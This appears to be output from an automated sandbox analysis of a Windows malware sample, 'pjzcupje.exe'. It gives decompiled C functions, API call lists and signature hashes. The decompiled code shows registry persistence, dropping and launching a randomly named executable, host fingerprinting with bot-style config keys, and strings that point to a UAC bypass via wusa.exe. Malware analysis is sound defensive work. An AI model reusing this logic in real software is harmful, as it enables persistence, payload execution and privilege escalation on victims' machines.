                                                                                                                                  			E00408328(char* __ecx, char __edx) {
                                                                                                                                  				char _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				int _v16;
                                                                                                                                  				char _v20;
                                                                                                                                  				intOrPtr _v24;
                                                                                                                                  				int _v28;
                                                                                                                                  				struct _PROCESS_INFORMATION _v44;
                                                                                                                                  				char _v60;
                                                                                                                                  				struct _STARTUPINFOA _v128;
                                                                                                                                  				char _v388;
                                                                                                                                  				char _v427;
                                                                                                                                  				char _v428;
                                                                                                                                  				char _t88;
                                                                                                                                  				char _t89;
                                                                                                                                  				void* _t91;
                                                                                                                                  				char _t93;
                                                                                                                                  				int _t102;
                                                                                                                                  				char _t107;
                                                                                                                                  				intOrPtr _t113;
                                                                                                                                  				char _t116;
                                                                                                                                  				void* _t117;
                                                                                                                                  				signed int _t122;
                                                                                                                                  				char _t126;
                                                                                                                                  				void* _t128;
                                                                                                                                  				char* _t130;
                                                                                                                                  				char _t131;
                                                                                                                                  				char* _t133;
                                                                                                                                  				char _t134;
                                                                                                                                  				char* _t137;
                                                                                                                                  				int _t139;
                                                                                                                                  				char _t144;
                                                                                                                                  				char _t146;
                                                                                                                                  				char* _t147;
                                                                                                                                  				char _t149;
                                                                                                                                  				char _t153;
                                                                                                                                  				intOrPtr* _t154;
                                                                                                                                  				char* _t156;
                                                                                                                                  				char* _t159;
                                                                                                                                  				char _t160;
                                                                                                                                  				char _t165;
                                                                                                                                  				void* _t174;
                                                                                                                                  				signed int _t177;
                                                                                                                                  				char _t180;
                                                                                                                                  				char* _t188;
                                                                                                                                  				int _t189;
                                                                                                                                  				long _t193;
                                                                                                                                  				void* _t195;
                                                                                                                                  				void* _t196;
                                                                                                                                  				void* _t198;
                                                                                                                                  				void* _t199;
                                                                                                                                  
                                                                                                                                  				_t181 = __edx;
                                                                                                                                  				_t173 = __ecx;
                                                                                                                                  				_v16 = 0;
                                                                                                                                  				if(E00407DD6(__edx) != 0) {
                                                                                                                                  					return 1;
                                                                                                                                  				}
                                                                                                                                  				_t88 = E00406EC3();
                                                                                                                                  				__eflags = _t88;
                                                                                                                                  				if(_t88 != 0) {
                                                                                                                                  					_v8 = 0;
                                                                                                                                  					__eflags =  *0x412c3c; // 0x0
                                                                                                                                  					if(__eflags == 0) {
                                                                                                                                  						goto L37;
                                                                                                                                  					}
                                                                                                                                  					__eflags =  *0x412c38; // 0x0
                                                                                                                                  					if(__eflags == 0) {
                                                                                                                                  						goto L37;
                                                                                                                                  					}
                                                                                                                                  					_t130 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
                                                                                                                                  					_t198 = _t196 + 0x14;
                                                                                                                                  					_t131 = RegOpenKeyExA(0x80000001, _t130, 0, 0x101,  &_v12);
                                                                                                                                  					__eflags = _t131;
                                                                                                                                  					if(_t131 != 0) {
                                                                                                                                  						L31:
                                                                                                                                  						_t133 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
                                                                                                                                  						_t198 = _t198 + 0x14;
                                                                                                                                  						_t134 = RegOpenKeyExA(0x80000001, _t133, 0, 0x103,  &_v12);
                                                                                                                                  						__eflags = _t134;
                                                                                                                                  						if(_t134 != 0) {
                                                                                                                                  							L35:
                                                                                                                                  							E0040EE2A(_t173, 0x4122f8, 0, 0x100);
                                                                                                                                  							_t196 = _t198 + 0xc;
                                                                                                                                  							__eflags = _v8;
                                                                                                                                  							if(_v8 != 0) {
                                                                                                                                  								E0040EC2E(_v8);
                                                                                                                                  							}
                                                                                                                                  							goto L37;
                                                                                                                                  						}
                                                                                                                                  						_t188 =  *0x412c3c; // 0x0
                                                                                                                                  						_t137 = _t188;
                                                                                                                                  						_t44 =  &(_t137[1]); // 0x1
                                                                                                                                  						_t173 = _t44;
                                                                                                                                  						do {
                                                                                                                                  							_t181 =  *_t137;
                                                                                                                                  							_t137 =  &(_t137[1]);
                                                                                                                                  							__eflags = _t181;
                                                                                                                                  						} while (_t181 != 0);
                                                                                                                                  						_t139 = _t137 - _t173 + 1;
                                                                                                                                  						__eflags = _t139;
                                                                                                                                  						RegSetValueExA(_v12,  *0x412c38, 0, 1, _t188, _t139);
                                                                                                                                  						RegCloseKey(_v12);
                                                                                                                                  						goto L35;
                                                                                                                                  					}
                                                                                                                                  					_t144 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, 0,  &_v16);
                                                                                                                                  					__eflags = _t144;
                                                                                                                                  					if(_t144 == 0) {
                                                                                                                                  						__eflags = _v28 - 1;
                                                                                                                                  						if(_v28 == 1) {
                                                                                                                                  							__eflags = _v16;
                                                                                                                                  							if(_v16 > 0) {
                                                                                                                                  								_t147 = E0040EBCC(_v16);
                                                                                                                                  								_pop(_t173);
                                                                                                                                  								_v8 = _t147;
                                                                                                                                  								__eflags = _t147;
                                                                                                                                  								if(_t147 != 0) {
                                                                                                                                  									_t173 =  &_v16;
                                                                                                                                  									_t149 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, _t147,  &_v16);
                                                                                                                                  									__eflags = _t149;
                                                                                                                                  									if(_t149 != 0) {
                                                                                                                                  										E0040EC2E(_v8);
                                                                                                                                  										_pop(_t173);
                                                                                                                                  										_v8 = 0;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					RegCloseKey(_v12);
                                                                                                                                  					__eflags = _v8;
                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                  						_t146 = E0040EED1(_v8,  *0x412c3c);
                                                                                                                                  						_pop(_t173);
                                                                                                                                  						__eflags = _t146;
                                                                                                                                  						if(_t146 == 0) {
                                                                                                                                  							goto L35;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					goto L31;
                                                                                                                                  				} else {
                                                                                                                                  					_t153 = E004073FF(_t173, 0x410264, 0, 0,  &_v388,  &_v60);
                                                                                                                                  					_t199 = _t196 + 0x14;
                                                                                                                                  					__eflags = _t153;
                                                                                                                                  					if(_t153 <= 0) {
                                                                                                                                  						L19:
                                                                                                                                  						_t91 = 0;
                                                                                                                                  						L56:
                                                                                                                                  						return _t91;
                                                                                                                                  					}
                                                                                                                                  					__eflags = _v388;
                                                                                                                                  					if(_v388 == 0) {
                                                                                                                                  						goto L19;
                                                                                                                                  					}
                                                                                                                                  					__eflags = _v60;
                                                                                                                                  					if(_v60 == 0) {
                                                                                                                                  						goto L19;
                                                                                                                                  					} else {
                                                                                                                                  						_t154 =  &_v388;
						_t181 = _t154 + 1;
						do {
							_t180 =  *_t154;
							_t154 = _t154 + 1;
							__eflags = _t180;
						} while (_t180 != 0);
						_t156 = _t195 + _t154 - _t181 - 0x181;
						__eflags =  *_t156 - 0x5c;
						if( *_t156 == 0x5c) {
							 *_t156 = 0;
						}
						__eflags =  *0x412159 - 0x60;
						if( *0x412159 < 0x60) {
							L18:
							E0040EE2A(_t180, 0x4122f8, 0, 0x100);
							_t196 = _t199 + 0xc;
							L37:
							_v20 = 0;
							_v8 = 0;
							__eflags = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe"; // 0x43
							if(__eflags == 0) {
								L42:
								__eflags =  *0x412cd8; // 0x0
								if(__eflags != 0) {
									L46:
									_t89 = E00406BA7(0x412cd8);
									_pop(_t174);
									__eflags = _t89;
									if(_t89 == 0) {
										L52:
										 *0x412cd8 = 0;
										L53:
										__eflags = _v8;
										if(_v8 != 0) {
											E0040EC2E(_v8);
										}
										_t91 = 1;
										__eflags = 1;
										goto L56;
									}
									_t93 = E00407E2F(_t181);
									__eflags = _t93;
									if(_t93 != 0) {
										L51:
										DeleteFileA(0x412cd8);
										goto L52;
									}
									_t193 = 0x44;
									E0040EE2A(_t174,  &_v128, 0, _t193);
									_v128.cb = _t193;
									E0040EE2A(_t174,  &_v44, 0, 0x10);
									_v428 = 0x22;
									lstrcpyA( &_v427, 0x412cd8);
									_t102 = lstrlenA( &_v428);
									 *((char*)(_t195 + _t102 - 0x1a8)) = 0x22;
									 *((char*)(_t195 + _t102 - 0x1a7)) = 0;
									E00407FCF(_t174);
									_t107 = CreateProcessA(0,  &_v428, 0, 0, 0, 0x8000000, 0, 0,  &_v128,  &_v44);
									__eflags = _t107;
									if(_t107 == 0) {
										E00407EE6(_t174);
										E00407EAD(_t181, __eflags, 0);
										goto L51;
									}
									CloseHandle(_v44.hThread);
									CloseHandle(_v44);
									goto L53;
								}
								GetTempPathA(0x12c, 0x412cd8);
								_t113 = E00408274(0x412cd8);
								_pop(_t177);
								_v24 = _t113;
								_t116 = (E0040ECA5() & 0x00000003) + 5;
								_v20 = _t116;
								__eflags = _t116;
								if(_t116 <= 0) {
									L45:
									_t117 = E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8);
									_t69 = _v24 + 0x412cd8; // 0x0
									E0040EF00(_t69, _t117);
									E0040EE2A(_t177, 0x4122f8, 0, 0x100);
									_t196 = _t196 + 0x28;
									goto L46;
								} else {
									goto L44;
								}
								do {
									L44:
									_t122 = E0040ECA5();
									_t177 = 0x1a;
									_t181 = _t122 % _t177 + 0x61;
									_v24 = _v24 + 1;
									_v20 = _v20 - 1;
									 *((char*)(_v24 + 0x412cd8)) = _t122 % _t177 + 0x61;
									__eflags = _v20;
								} while (_v20 > 0);
								goto L45;
							}
							_t126 = E0040675C("C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe",  &_v20, 0);
							_t196 = _t196 + 0xc;
							_v8 = _t126;
							__eflags = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe"; // 0x43
							if(__eflags == 0) {
								goto L42;
							}
							__eflags = _t126;
							if(_t126 == 0) {
								goto L42;
							}
							__eflags = _v20 -  *0x4121a4; // 0x0
							if(__eflags != 0) {
								goto L42;
							}
							_t128 = E004024C2(_v8, _t127, 0);
							_t196 = _t196 + 0xc;
							__eflags =  *0x4122d4 - _t128; // 0x0
							if(__eflags == 0) {
								goto L53;
							}
							goto L42;
						}
						_t189 = 4;
						_v8 = 0;
						_v16 = _t189;
						_t159 = E00402544(0x4122f8,  &E00410710, 0x35, 0xe4, 0xc8);
						_t199 = _t199 + 0x14;
						_t160 = RegOpenKeyExA(0x80000002, _t159, 0, 0x103,  &_v12);
						__eflags = _t160;
						if(_t160 != 0) {
							goto L18;
						}
						_t165 = RegQueryValueExA(_v12,  &_v388, 0,  &_v28,  &_v8,  &_v16);
						__eflags = _t165;
						if(_t165 != 0) {
							L16:
							_v8 = 0;
							RegSetValueExA(_v12,  &_v388, 0, _t189,  &_v8, _t189);
							L17:
							RegCloseKey(_v12);
							goto L18;
						}
						__eflags = _v28 - _t189;
						if(_v28 != _t189) {
							goto L16;
						}
						__eflags = _v16 - _t189;
						if(_v16 != _t189) {
							goto L16;
						}
						__eflags = _v8;
						if(_v8 == 0) {
							goto L17;
						}
						goto L16;
					}
				}
			}
                                                                                                                                  0x0040853f
                                                                                                                                  0x00408541
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408541
                                                                                                                                  0x00000000
                                                                                                                                  0x0040835c
                                                                                                                                  0x0040836e
                                                                                                                                  0x00408373
                                                                                                                                  0x00408376
                                                                                                                                  0x00408378
                                                                                                                                  0x00408464
                                                                                                                                  0x00408464
                                                                                                                                  0x00408779
                                                                                                                                  0x00000000
                                                                                                                                  0x0040877a
                                                                                                                                  0x0040837e
                                                                                                                                  0x00408384
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040838a
                                                                                                                                  0x0040838d
                                                                                                                                  0x00000000
                                                                                                                                  0x00408393
                                                                                                                                  0x00408393
                                                                                                                                  0x00408399
                                                                                                                                  0x0040839c
                                                                                                                                  0x0040839c
                                                                                                                                  0x0040839e
                                                                                                                                  0x0040839f
                                                                                                                                  0x0040839f
                                                                                                                                  0x004083a5
                                                                                                                                  0x004083ac
                                                                                                                                  0x004083af
                                                                                                                                  0x004083b1
                                                                                                                                  0x004083b1
                                                                                                                                  0x004083b3
                                                                                                                                  0x004083ba
                                                                                                                                  0x00408450
                                                                                                                                  0x00408457
                                                                                                                                  0x0040845c
                                                                                                                                  0x004085c2
                                                                                                                                  0x004085c2
                                                                                                                                  0x004085c5
                                                                                                                                  0x004085c8
                                                                                                                                  0x004085ce
                                                                                                                                  0x00408615
                                                                                                                                  0x0040861a
                                                                                                                                  0x00408620
                                                                                                                                  0x004086a7
                                                                                                                                  0x004086a8
                                                                                                                                  0x004086ad
                                                                                                                                  0x004086ae
                                                                                                                                  0x004086b0
                                                                                                                                  0x00408762
                                                                                                                                  0x00408762
                                                                                                                                  0x00408768
                                                                                                                                  0x00408768
                                                                                                                                  0x0040876b
                                                                                                                                  0x00408770
                                                                                                                                  0x00408775
                                                                                                                                  0x00408778
                                                                                                                                  0x00408778
                                                                                                                                  0x00000000
                                                                                                                                  0x00408778
                                                                                                                                  0x004086b6
                                                                                                                                  0x004086bb
                                                                                                                                  0x004086bd
                                                                                                                                  0x0040875b
                                                                                                                                  0x0040875c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040875c
                                                                                                                                  0x004086c5
                                                                                                                                  0x004086cc
                                                                                                                                  0x004086d8
                                                                                                                                  0x004086db
                                                                                                                                  0x004086eb
                                                                                                                                  0x004086f2
                                                                                                                                  0x004086ff
                                                                                                                                  0x00408705
                                                                                                                                  0x0040870d
                                                                                                                                  0x00408714
                                                                                                                                  0x00408733
                                                                                                                                  0x00408739
                                                                                                                                  0x0040873b
                                                                                                                                  0x0040874f
                                                                                                                                  0x00408755
                                                                                                                                  0x00000000
                                                                                                                                  0x0040875a
                                                                                                                                  0x00408746
                                                                                                                                  0x0040874b
                                                                                                                                  0x00000000
                                                                                                                                  0x0040874b
                                                                                                                                  0x0040862c
                                                                                                                                  0x00408633
                                                                                                                                  0x00408638
                                                                                                                                  0x00408639
                                                                                                                                  0x00408644
                                                                                                                                  0x00408647
                                                                                                                                  0x0040864a
                                                                                                                                  0x0040864c
                                                                                                                                  0x00408671
                                                                                                                                  0x00408683
                                                                                                                                  0x0040868c
                                                                                                                                  0x00408693
                                                                                                                                  0x0040869f
                                                                                                                                  0x004086a4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040864e
                                                                                                                                  0x0040864e
                                                                                                                                  0x0040864e
                                                                                                                                  0x00408657
                                                                                                                                  0x0040865d
                                                                                                                                  0x00408660
                                                                                                                                  0x00408663
                                                                                                                                  0x00408666
                                                                                                                                  0x0040866c
                                                                                                                                  0x0040866c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040864e
                                                                                                                                  0x004085da
                                                                                                                                  0x004085df
                                                                                                                                  0x004085e2
                                                                                                                                  0x004085e5
                                                                                                                                  0x004085eb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004085ed
                                                                                                                                  0x004085ef
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004085f4
                                                                                                                                  0x004085fa
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408601
                                                                                                                                  0x00408606
                                                                                                                                  0x00408609
                                                                                                                                  0x0040860f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040860f
                                                                                                                                  0x004083c2
                                                                                                                                  0x004083df
                                                                                                                                  0x004083e2
                                                                                                                                  0x004083e5
                                                                                                                                  0x004083ea
                                                                                                                                  0x004083f3
                                                                                                                                  0x004083f9
                                                                                                                                  0x004083fb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408414
                                                                                                                                  0x0040841a
                                                                                                                                  0x0040841c
                                                                                                                                  0x0040842d
                                                                                                                                  0x0040843e
                                                                                                                                  0x00408441
                                                                                                                                  0x00408447
                                                                                                                                  0x0040844a
                                                                                                                                  0x00000000
                                                                                                                                  0x0040844a
                                                                                                                                  0x0040841e
                                                                                                                                  0x00408421
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408423
                                                                                                                                  0x00408426
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408428
                                                                                                                                  0x0040842b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040842b
                                                                                                                                  0x0040838d

APIs
• RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 004083F3
• RegQueryValueExA.ADVAPI32(00410750,?,00000000,?,00408893,?,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408414
• RegSetValueExA.ADVAPI32(00410750,?,00000000,00000004,00408893,00000004,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408441
• RegCloseKey.ADVAPI32(00410750,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 0040844A
Strings
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Yara matches
Similarity
• API ID: Value$CloseOpenQuery
• String ID: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe$localcfg
• API String ID: 237177642-493989863
• Opcode ID: efd62ad2f798959cafcb8abb2af2c905d2a72a8beefa2774c48dbd7e0eb95f79
• Instruction ID: 84ba07e5042139a9063b988de9b3f7486f2cd5d6c0453319c527b22e45c4d953
• Opcode Fuzzy Hash: efd62ad2f798959cafcb8abb2af2c905d2a72a8beefa2774c48dbd7e0eb95f79
• Instruction Fuzzy Hash: DAC1D2B1D00109BEEB11ABA0DE85EEF7BBCEB04304F14447FF544B2191EA794E948B69
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
Similarity
• API ID: ___check_float_string$__inc$_isdigit$__filbuf
• String ID: +
• API String ID: 2300710676-2126386893
• Opcode ID: ad1f5bb9c355918d75b7c057bde0c440c9cfce169a1ae502d87da89f97f783a0
• Instruction ID: 3027c3f7f7f7b209974f4d897e9ad327b7b2965923b83da4b714fa7d9bf2a412
• Opcode Fuzzy Hash: ad1f5bb9c355918d75b7c057bde0c440c9cfce169a1ae502d87da89f97f783a0
• Instruction Fuzzy Hash: 44F172B5D00659DBCF14DFA9CC90AEEBB75BF84304F14829AD81A67302D739AA80CF55
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                  			E00401D96(void* __ecx, intOrPtr* _a4) {
                                                                                                                                  				struct _OSVERSIONINFOA _v156;
                                                                                                                                  				struct _SYSTEM_INFO _v192;
                                                                                                                                  				char _v196;
                                                                                                                                  				intOrPtr _v200;
                                                                                                                                  				intOrPtr _t59;
                                                                                                                                  				signed int _t61;
                                                                                                                                  				signed int _t63;
                                                                                                                                  				void* _t65;
                                                                                                                                  				intOrPtr _t66;
                                                                                                                                  				intOrPtr _t67;
                                                                                                                                  				signed int _t71;
                                                                                                                                  				intOrPtr _t93;
                                                                                                                                  				intOrPtr _t96;
                                                                                                                                  				intOrPtr _t97;
                                                                                                                                  				intOrPtr _t102;
                                                                                                                                  				intOrPtr* _t103;
                                                                                                                                  				intOrPtr* _t105;
                                                                                                                                  				void* _t109;
                                                                                                                                  				void* _t110;
                                                                                                                                  				void* _t111;
                                                                                                                                  				void* _t112;
                                                                                                                                  				void* _t113;
                                                                                                                                  				void* _t114;
                                                                                                                                  
                                                                                                                                  				_t105 = _a4;
                                                                                                                                  				_t102 = 0x64;
                                                                                                                                  				E0040EE2A(__ecx, _t105, 0, _t102);
                                                                                                                                  				_t109 =  &_v200 + 0xc;
                                                                                                                                  				 *_t105 = _t102;
                                                                                                                                  				_v156.dwOSVersionInfoSize = 0x9c;
                                                                                                                                  				if(GetVersionExA( &_v156) == 0) {
                                                                                                                                  					 *((char*)(_t105 + 0x41)) = 0;
                                                                                                                                  				} else {
                                                                                                                                  					 *((char*)(_t105 + 0x41)) = (_v156.dwMajorVersion << 4) + _v156.dwMinorVersion;
                                                                                                                                  				}
                                                                                                                                  				GetSystemInfo( &_v192);
                                                                                                                                  				 *((char*)(_t105 + 0x3f)) = _v192.dwNumberOfProcessors;
                                                                                                                                  				_v196 = 0;
                                                                                                                                  				_t103 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                                                                                                                                  				if(_t103 != 0) {
                                                                                                                                  					 *_t103(GetCurrentProcess(),  &_v196);
                                                                                                                                  				}
                                                                                                                                  				_t104 = "localcfg";
                                                                                                                                  				 *((char*)(_t105 + 0x40)) = 2;
                                                                                                                                  				_t59 = E0040E819(1, "localcfg", "lid_file_upd", 0);
                                                                                                                                  				_t92 = "flags_upd";
                                                                                                                                  				 *((intOrPtr*)(_t105 + 0x24)) = _t59;
                                                                                                                                  				 *(_t105 + 4) =  *(_t105 + 4) | E0040E819(1, "localcfg", "flags_upd", 0);
                                                                                                                                  				_t61 =  *(_t105 + 4);
                                                                                                                                  				_t110 = _t109 + 0x20;
                                                                                                                                  				if((_t61 & 0x00000008) != 0) {
                                                                                                                                  					 *(_t105 + 4) = _t61 & 0xfffffff7;
                                                                                                                                  					E0040DF70(1, "work_srv");
                                                                                                                                  					E0040DF70(1, "start_srv");
                                                                                                                                  					_t110 = _t110 + 0x10;
                                                                                                                                  				}
                                                                                                                                  				E0040EA84(1, _t104, _t92, 0);
                                                                                                                                  				_t93 = 0;
                                                                                                                                  				_t63 = E0040E819(1, _t104, "net_type", 0);
                                                                                                                                  				_t111 = _t110 + 0x20;
                                                                                                                                  				 *(_t105 + 0x14) = _t63;
                                                                                                                                  				if(E0040199C(_t63) == 0) {
                                                                                                                                  					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000010;
                                                                                                                                  				} else {
                                                                                                                                  					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000020;
                                                                                                                                  				}
                                                                                                                                  				_t65 = E0040E819(1, _t104, "born_date", _t93);
                                                                                                                                  				_t112 = _t111 + 0x10;
                                                                                                                                  				 *((intOrPtr*)(_t105 + 0x30)) = _t93;
                                                                                                                                  				if(_t65 == _t93) {
                                                                                                                                  					_t97 = E0040F04E(_t93);
                                                                                                                                  					E0040EA84(1, _t104, "born_date", _t97);
                                                                                                                                  					_t112 = _t112 + 0x14;
                                                                                                                                  					 *((intOrPtr*)(_t105 + 0x30)) = _t97;
                                                                                                                                  					_t93 = 0;
                                                                                                                                  				}
                                                                                                                                  				_t94 = "id";
                                                                                                                                  				_t66 = E0040E819(1, _t104, "id", _t93);
                                                                                                                                  				_t113 = _t112 + 0x10;
                                                                                                                                  				 *((intOrPtr*)(_t105 + 0xc)) = _t66;
                                                                                                                                  				if(_t66 == 0) {
                                                                                                                                  					_v200 = E00401B71();
                                                                                                                                  					E0040EA84(1, _t104, _t94, _t77);
                                                                                                                                  					_t113 = _t113 + 0x10;
                                                                                                                                  					 *((intOrPtr*)(_t105 + 0xc)) = _v200;
                                                                                                                                  				}
                                                                                                                                  				_t95 = "hi_id";
                                                                                                                                  				_t67 = E0040E819(1, _t104, "hi_id", 0);
                                                                                                                                  				_t114 = _t113 + 0x10;
                                                                                                                                  				 *((intOrPtr*)(_t105 + 0x10)) = _t67;
                                                                                                                                  				if(_t67 == 0) {
                                                                                                                                  					_v200 = E00401BDF();
                                                                                                                                  					E0040EA84(1, _t104, _t95, _t74);
                                                                                                                                  					_t114 = _t114 + 0x10;
                                                                                                                                  					 *((intOrPtr*)(_t105 + 0x10)) = _v200;
                                                                                                                                  				}
                                                                                                                                  				 *((intOrPtr*)(_t105 + 8)) = 0x5e;
                                                                                                                                  				_t96 = E0040E819(1, _t104, "loader_id", 0);
                                                                                                                                  				if(_t96 == 0) {
                                                                                                                                  					_t96 = 0xd;
                                                                                                                                  					E0040EA84(1, _t104, "loader_id", _t96);
                                                                                                                                  				}
                                                                                                                                  				 *((intOrPtr*)(_t105 + 0x1c)) = _t96;
                                                                                                                                  				 *((intOrPtr*)(_t105 + 0x34)) = E004030B5();
                                                                                                                                  				if( *0x41201d == 0) {
                                                                                                                                  					if( *0x41201f == 0) {
                                                                                                                                  						 *(_t105 + 0x18) =  *(_t105 + 0x18) & 0x00000000;
                                                                                                                                  					} else {
                                                                                                                                  						if(E00406EC3() != 0) {
                                                                                                                                  							 *(_t105 + 0x18) = 2;
                                                                                                                                  						} else {
                                                                                                                                  							 *(_t105 + 0x18) = 0x10;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				} else {
                                                                                                                                  					 *(_t105 + 0x18) = 1;
                                                                                                                                  				}
                                                                                                                                  				if(_v196 != 0) {
                                                                                                                                  					 *(_t105 + 0x18) =  *(_t105 + 0x18) | 0x00000200;
                                                                                                                                  				}
                                                                                                                                  				_t71 = GetTickCount() / 0x3e8;
                                                                                                                                  				 *0x412110 = _t71;
                                                                                                                                  				 *(_t105 + 0x28) = _t71;
                                                                                                                                  				return _t71;
                                                                                                                                  			}
                                                                                                                                  0x00401f9c
                                                                                                                                  0x00401fa3
                                                                                                                                  0x00401fae
                                                                                                                                  0x00401fa5
                                                                                                                                  0x00401fa5
                                                                                                                                  0x00401fa5
                                                                                                                                  0x00401fa3
                                                                                                                                  0x00401f8e
                                                                                                                                  0x00401f8e
                                                                                                                                  0x00401f8e
                                                                                                                                  0x00401fc0
                                                                                                                                  0x00401fc2
                                                                                                                                  0x00401fc2
                                                                                                                                  0x00401fd6
                                                                                                                                  0x00401fd9
                                                                                                                                  0x00401fde
                                                                                                                                  0x00401fea

                                                                                                                                  APIs
                                                                                                                                  • GetVersionExA.KERNEL32 ref: 00401DC6
                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 00401DE8
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 00401E03
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00401E0A
                                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 00401E1B
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00401FC9
                                                                                                                                    • Part of subcall function 00401BDF: GetComputerNameA.KERNEL32 ref: 00401C15
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                                                                  • String ID: 0 v$IsWow64Process$born_date$flags_upd$hi_id$kernel32$lid_file_upd$loader_id$localcfg$net_type$start_srv$work_srv
                                                                                                                                  • API String ID: 4207808166-1853734742
                                                                                                                                  • Opcode ID: 857587d66ef5407bd9f823cee7786aca052e01b20ac6ebc7d69f7416010c46cb
                                                                                                                                  • Instruction ID: cd5e56fee8dacda117f2c3378b491c5a2df23dd5de729853a430aab3da097112
                                                                                                                                  • Opcode Fuzzy Hash: 857587d66ef5407bd9f823cee7786aca052e01b20ac6ebc7d69f7416010c46cb
                                                                                                                                  • Instruction Fuzzy Hash: 2551EA705043446FD330AF768C85F67BAECEB84708F00493FF955A2292D7BDA94487A9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 0040139A
                                                                                                                                  • lstrlenW.KERNEL32(-00000003), ref: 00401571
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExecuteShelllstrlen
                                                                                                                                  • String ID: $%systemroot%\system32\cmd.exe$<$@$D$uac$useless$wusa.exe
                                                                                                                                  • API String ID: 1628651668-1839596206
                                                                                                                                  • Opcode ID: ab4c75885172d034ed3803886c8c211ded8e4a09802339f18fb7352a61972d3c
                                                                                                                                  • Instruction ID: 915494465e6448ea0d8334ed2feda226c725056e28db06d0983f622db304c09c
                                                                                                                                  • Opcode Fuzzy Hash: ab4c75885172d034ed3803886c8c211ded8e4a09802339f18fb7352a61972d3c
                                                                                                                                  • Instruction Fuzzy Hash: E5F19FB55083419FD720DF64C888BABB7E5FB88304F10892EF596A73A0D778D944CB5A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 54%
                                                                                                                                  			E0040199C(void* __eax) {
                                                                                                                                  				long _v8;
                                                                                                                                  				_Unknown_base(*)()* _v12;
                                                                                                                                  				struct HINSTANCE__* _v16;
                                                                                                                                  				char _v20;
                                                                                                                                  				void* _v24;
                                                                                                                                  				long _v28;
                                                                                                                                  				_Unknown_base(*)()* _t30;
                                                                                                                                  				intOrPtr _t32;
                                                                                                                                  				void* _t34;
                                                                                                                                  				void* _t41;
